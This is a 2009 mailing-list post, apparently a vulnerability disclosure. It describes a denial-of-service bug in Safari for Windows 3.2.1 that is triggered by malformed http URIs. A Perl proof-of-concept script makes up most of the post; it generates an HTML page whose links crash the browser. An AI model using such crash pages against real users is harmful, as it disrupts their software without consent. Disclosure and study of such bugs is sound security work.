Safari for Windows 3.2.1 Remote http: URI handler DoS

0 views
Skip to first unread message

Lostmon lords

unread,
Jan 27, 2009, 4:55:42 PM1/27/09
to los...@googlegroups.com
original article => http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html

 A "malformed" http domain name , can cause that safari turn in a infinite loop 
     wen try to resolve this domain, and it can cause at memory level a 
    access violation wen try to write a secction that contains unknow data. 
    See Safari_httpDoSPoc.pl  file to demostrate it !

AppName: safari.exe     AppVer: 3.525.27.1     ModName: safari.exe
ModVer: 3.525.27.1     Offset: 00089394

######################################################
#!/usr/bin/perl
#Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Los...@gmail.com ]
#[http://lostmon.blogspot.com]


$archivo = $ARGV[0];
if(!defined($archivo))
{

     print "Uso: $0 <archivo.html>\n";

}

$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(los...@gmail.com) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"http://../\">Safari Die()</a> or this other =><a href=\"http://./\">Safari Die()</a>
";
$piepag = "</body></html>";

$datos = $cabecera . $codigo . $piepag;

     open(FILE, '>' . $archivo);
     print FILE $datos;
     close(FILE);

exit;

################################################


Thnx To estrella to be my ligth
Thnx to all who belive in me...

--
atentamente:
Lostmon (los...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
safari_excepcion.GIF
Reply all
Reply to author
Forward
0 new messages